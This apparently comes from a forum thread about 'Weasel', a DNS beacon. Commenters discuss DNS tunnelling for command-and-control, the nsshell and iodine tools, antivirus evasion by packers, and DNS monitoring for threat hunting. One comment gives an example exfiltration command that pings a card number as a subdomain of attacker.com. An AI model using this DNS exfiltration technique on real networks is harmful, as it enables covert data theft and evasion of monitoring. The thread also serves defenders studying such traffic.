Weasel: A Stealthy DNS Beacon
github.com
github.com
Also -- this specifically exploits IPv6 DNS information: You're checking that manually even at your small scale?
Edit: If you're looking to passively monitor your DNS I'm a big fan of CIRCL's D4 project that's just getting up and running. Check it out! https://www.d4-project.org/
Most notably nsshell doesn't even need the target to run python. I have written a bunch of exploit modules for it, and the only exploit modules that require python are the jinja2 template injection modules. (https://github.com/TheRook/nsshell/blob/master/nsshell/loade...)
I like your encryption protocol, I might adopt it.
https://github.com/yarrick/iodine
Allows exfiltrating data using dns.
Besides, even if you saw these queries you’d have no easy way of know I’d they were malicious or not.
Additionally, I’ve never understood how packers don’t get detected by AV. Normal software isn’t typically extremely high entropy, is it?
The most simple example someone gave me years ago was if someone wants to exfiltrate a credit card number, they can ping 4084515531278764-0424-789.attacker.com from an internal system. It doesn't matter if the ping succeeds. If the internal system gets a resolution response back from the internal DNS, the attacker has the card number in their DNS logs.
Tunneling TCP or other C2 traffic is just an extension of that which includes the attacker's DNS server sending a message (4 arbitrary bytes in the form of an IPv4 address, or more data in the form of a TXT record response, etc.) back to the internal system via the normal response path.
Its pretty clever, IMO. Most sysadmins think of DNS as being like a phonebook, but phonebooks are a single, supposedly authoritative source, and DNS is decentralized.
I didn't even consider the normal resolver path because of caching,rate limits and perfmance but it's not like we're building a production protocol here, it just needs to work enough to facilitiate minimao communication.
This will make an interesting threar hunting excercise.